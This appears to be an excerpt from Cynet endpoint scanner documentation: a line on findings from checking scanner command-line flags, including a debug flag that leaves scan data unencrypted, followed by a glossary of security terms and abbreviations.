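On the typical line the only findings are the two flags (-scanid, -alwayson) that the table does not document, which is exactly the case the guide tells you to raise with Cynet support; the misconfigured line produces nine findings, including the troubleshooting flag -debugconfig that leaves scan data unencrypted on disk.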

Terms and Abbreviations

The following terms and abbreviations are used throughout this document:

Term / Abbreviation    Definition
AV    Antivirus
CISO    Chief Information Security Officer
CMDB    Configuration Management Database
CSV    Comma-Separated Values
DNS    Domain Name System
EDR    Endpoint Detection and Response
EPS    Endpoint Scanner
IoC    Indicator of Compromise
IP    Internet Protocol
KB    Knowledge Base
MFA    Multi-Factor Authentication
NGAV    Next Generation Antivirus
Object    A file, User, host, network, or socket
ODBC    Open Database Connectivity
OS    Operating System
OU    Organizational Unit
RDP    Remote Desktop Protocol
RPC    Remote Procedure Call
SOC    Security Operations Center
SIEM    Security Information and Event Management
SSE    Server-Sent Events
SSH    Secure Shell
UBA    User Behavior Analytics
UEBA    User and Entity Behavior Analytics
UI    User Interface
URL    Uniform Resource Locator (Web address)
VPC    Virtual Private Cloud